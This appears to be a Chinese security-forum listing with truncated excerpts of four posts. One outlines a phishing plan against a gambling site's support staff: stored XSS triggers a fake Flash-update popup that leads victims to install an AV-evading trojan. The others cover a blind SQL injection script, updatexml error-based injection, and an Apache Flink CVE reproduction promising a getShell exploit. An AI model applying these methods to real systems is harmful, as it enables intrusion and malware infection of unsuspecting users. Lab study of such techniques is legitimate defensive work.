flash钓鱼
前言:这篇文章写在我搞到某个bc的边缘系统的时候,没啥重要信息,而且没内网。但因为这是个客服系统所以,我决定钓鱼。想想都特码刺激。准备:服务器,存放钓鱼页面2.域名3.免杀木马4.fash页面总体思路就是:对方有存储xss漏洞或者你有网站权限—>插入js触发flash版本过低弹窗—>对方点击确定—>跳转到我们的flash界面—>对方点击下载并安装—>触发我们的木马
基于二分法的sql布尔盲注脚本
代码写的很潦草,自用保存。但是速度比sqlmap快多了。`import requestsurl2="http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_sc
通过靶场head注入对updatexml用法的思考
前言本人是十一期学员,今天在写head注入的作业的时候,用到了updatexml函数,寻根究底之,于是有了此文。正文本着能省则省的精神,去掉了concat,看看有没有啥影响,结果出现以下问题:updatexml(0x7e,(select database()),0x7e) #不可输出updatexml(0x7e,(select user()),0x7e) #可输出我们发现同样的语法,为啥da
复现apache Flink(CVE-2020-17518/17519)附getShell EXP
安装环境CVE-2020-175181.拉取vulhub环境(github搜vulhub自己下)2.进入目录cd vulhub/flink/CVE-2020-175183.启动环境docker-compose up -d通过浏览器访问http:your-ip:8081界面如下4.点击Add new按钮抓包5.进入docker环境,查看是否创建成功docker psdocker exec